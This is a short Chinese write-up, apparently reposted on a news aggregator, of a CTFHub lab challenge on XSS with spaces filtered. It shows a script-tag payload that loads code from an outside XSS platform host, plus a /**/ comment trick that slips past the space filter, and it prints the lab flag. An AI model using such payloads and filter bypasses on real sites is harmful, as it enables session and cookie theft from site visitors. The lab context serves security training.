当前位置: 首页 > news >正文

CTFHUB技能树之XSS——过滤空格

news 2024/10/21 18:45:18

开启靶场,打开链接:

看上去是GET传参,有点像反射型的那题

在第一个输入框中输入:

<sCRiPt sRC=//xs.pe/6b6></sCrIpT>

没什么反应,右键查看源代码:

发现<sCRiPt sRC=//xs.pe/6b6></sCrIpT>中的sCRiPt和sRC之间的空格消失了,对空格做了过滤处理

用/**/绕过:

<sCRiPt/**/sRC=//xs.pe/6b6></sCrIpT>

提交之后再复制地址栏中的URL,粘贴到第二个输入框中提交:

成功得到flag:

ctfhub{5f10e129d697165a8083b5be}


http://www.mrgr.cn/news/55399.html

相关文章:

  • C语言 | Leetcode C语言题解之第480题滑动窗口中位数
  • C#中Task.ContinueWith如何使用
  • 价值投资(Value Investing)
  • iOS Swift逆向——deMangle过程中的偏移计算
  • TCP/IP 协议【四次挥手】简要说明
  • MySQL 中的外键检查设置:SET FOREIGN_KEY_CHECKS = 1
  • 安达发|日化品APS智能排产系统的物料齐套欠料分析
  • 【已解决】Eclipse下载安装和环境配置 超详细教程 小白
  • 微服务的一些基本概念
  • Java程序员最好的AI框架,伴随着Spring到来了
  • React是如何处理事件的?
  • 颜廷利:东方智慧的现代诠释者
  • keras的内部的模块有哪些? (自用便签)
  • 《七龙珠:电光炸裂 Zero》销量破纪录,AOC U32G4ZMN带你重燃格斗热血!
  • istio多主集群架构验证方法
  • Kafka之原理解析
  • 正点原子 linux 几个编译器之间的关系
  • [单master节点k8s部署]42.全链路监控(一)
  • 【p2p、分布式,区块链笔记 Blockchain】truffle003 测试网络准备
  • 关于动态规划的一份介绍
  • 【AI大模型】本地部署 Code Llama 大模型
  • ROS 2 Jazzy Jalisco 模型工具 Xacro 总结和习题
  • FineReport 页面设置
  • 【小白学机器学习17】 概率论的认识论和方法论
  • 鲸信私有化即时通信如何平衡安全性与易用性之间的关系?
  • 观察者模式